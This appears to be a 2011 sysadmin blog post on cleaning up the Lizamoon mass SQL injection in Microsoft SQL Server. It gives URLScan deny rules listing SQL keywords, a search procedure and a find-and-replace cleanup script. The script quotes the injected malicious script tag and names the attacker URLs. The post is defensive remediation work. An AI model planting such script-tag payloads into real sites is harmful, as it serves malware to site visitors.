Lizamoon.com knows SEO! Or how to fix an MSSQL injection. (NEW) –t6ryt56.info/ur.php

vty — Wed, 30 Mar 2011 00:58:08 +0000

Edit3: Currently testing the following urlscan sql inject blocking rules;

I don’t have time to fix the wordpress syntax issues, so I’m posting the code on Pastebin also;

CODE ALSO HERE http://pastebin.com/y40r6X6J

RuleList=SQL Injection

 

[SQL Injection]

AppliesTo=.asp,.aspx

DenyDataSection=SQL Injection Strings

ScanUrl=0

ScanAllRaw=0

ScanQueryString=1

ScanHeaders=SQL Injection Headers



[SQL Injection Strings]

--

%3b ; a semicolon

/*

@ ; also catches @@

char ; also catches nchar and varchar

alter

begin

cast

convert

cursor

declare

delete

drop

end

exec ; also catches execute

fetch

kill

open

select

sys ; also catches sysobjects and syscolumns

table



[SQL Injection Headers]



AppliesTo=.asp,.aspx

DenyDataSection=SQL Injection Headers Strings

ScanUrl=0

ScanAllRaw=0

ScanQueryString=0

ScanHeaders=Cookie:



[SQL Injection Headers Strings]

--

@ ; also catches @@

alter

cast

convert

declare

delete

drop

exec ; also catches execute

fetch

insert

kill

select

Edit2: I am now seeing injections using hxxp://t6ryt56.info/ur.php as the URL instead of lizamoon.

Edit: I’m still working out the WordPress code issues. A lot has been appended that should not be in the below code, etc, will fix soon.

Great information located here, Websense appears to be keeping pretty up to date on it;

http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx

I have a feeling that this Lizamoon.com inject will be getting around quite a bit.

Here are the steps I took to resolve post-injection, – tested on SQL2k5 – CODE ALSO HERE http://pastebin.com/M3BmePWC

1. I wanted an easy way to track down every instance of a keyword in EVERY column and table. I used this stored procedure;


CREATE PROC FindAll

(

    @SearchStr nvarchar(100)

)

AS

BEGIN

 CREATE TABLE #Results (ColumnName nvarchar(370), ColumnValue nvarchar(3630))



    SET NOCOUNT ON



    DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110)

    SET  @TableName = ''

    SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')



    WHILE @TableName IS NOT NULL

    BEGIN

        SET @ColumnName = ''

        SET @TableName =

        (

            SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))

            FROM    INFORMATION_SCHEMA.TABLES

            WHERE       TABLE_TYPE = 'BASE TABLE'

                AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName

                AND OBJECTPROPERTY(

                        OBJECT_ID(

                            QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)

                             ), 'IsMSShipped'

                               ) = 0

        )



        WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)

        BEGIN

            SET @ColumnName =

            (

                SELECT MIN(QUOTENAME(COLUMN_NAME))

                FROM    INFORMATION_SCHEMA.COLUMNS

                WHERE       TABLE_SCHEMA    = PARSENAME(@TableName, 2)

                    AND TABLE_NAME  = PARSENAME(@TableName, 1)

                    AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')

                    AND QUOTENAME(COLUMN_NAME) > @ColumnName

            )



            IF @ColumnName IS NOT NULL

            BEGIN

                INSERT INTO #Results

                EXEC

                (

                    'SELECT ''' + @TableName + '.' + @ColumnName + ''', LEFT(' + @ColumnName + ', 3630)

                    FROM ' + @TableName + ' (NOLOCK) ' +

                    ' WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2

                )

            END

        END

    END



    SELECT ColumnName, ColumnValue FROM #Results

END

This will be executed via the following query;

EXEC FindAll 'lizamoon'

Now that we know what we’re working against, you’ll want to find and replace with blank space (this will not affect anything outside of the string). CODE ALSO HERE – http://pastebin.com/cJ1SWaKh

SET NOCOUNT ON

DECLARE @stringToFind VARCHAR(100)
DECLARE @stringToReplace VARCHAR(100)
DECLARE @schema sysname
DECLARE @table

sysname

DECLARE @count INT
DECLARE @sqlCommand VARCHAR(8000)
DECLARE @where VARCHAR(8000)
DECLARE @columnName

sysname

DECLARE @object_id INT

SET @stringToFind = '</title><script src=http://lizamoon.com/ur.php></script>'
SET @stringToReplace = ''

DECLARE TAB_CURSOR CURSOR  FOR
SELECT   B.NAME      AS SCHEMANAME,
A.NAME      AS TABLENAME,
A.OBJECT_ID
FROM     sys.objects A
INNER JOIN sys.schemas B
ON A.SCHEMA_ID = B.SCHEMA_ID
WHERE    TYPE = 'U'
ORDER BY 1

OPEN TAB_CURSOR

FETCH NEXT FROM TAB_CURSOR
INTO @schema,
@table,
@object_id

WHILE @@FETCH_STATUS = 0
BEGIN
DECLARE COL_CURSOR CURSOR FOR
SELECT A.NAME
FROM sys.columns A
INNER JOIN sys.types B
ON A.SYSTEM_TYPE_ID = B.SYSTEM_TYPE_ID
WHERE OBJECT_ID = @object_id
AND IS_COMPUTED = 0
AND B.NAME IN ('char','nchar','nvarchar','varchar','text','ntext')

OPEN COL_CURSOR

FETCH NEXT FROM COL_CURSOR
INTO @columnName

WHILE @@FETCH_STATUS = 0
BEGIN
SET @sqlCommand = 'UPDATE ' + @schema + '.' + @table + ' SET [' + @columnName + '] = REPLACE(convert(nvarchar(max),[' + @columnName + ']),''' + @stringToFind + ''',''' + @stringToReplace + ''')'

SET @where = ' WHERE [' + @columnName + '] LIKE ''%' + @stringToFind + '%'''

EXEC( @sqlCommand + @where)

SET @count = @@ROWCOUNT

IF @count > 0
BEGIN
PRINT @sqlCommand + @where
PRINT 'Updated: ' + CONVERT(VARCHAR(10),@count)
PRINT '----------------------------------------------------'
END

FETCH NEXT FROM COL_CURSOR
INTO @columnName
END

CLOSE COL_CURSOR
DEALLOCATE COL_CURSOR

FETCH NEXT FROM TAB_CURSOR
INTO @schema,
@table,
@object_id
END

CLOSE TAB_CURSOR
DEALLOCATE TAB_CURSOR

vty — Thu, 31 Dec 2009 00:44:05 +0000

my ccie/jncie diagrams

vty.cc

Lizamoon.com knows SEO! Or how to fix an MSSQL injection. (NEW) –t6ryt56.info/ur.php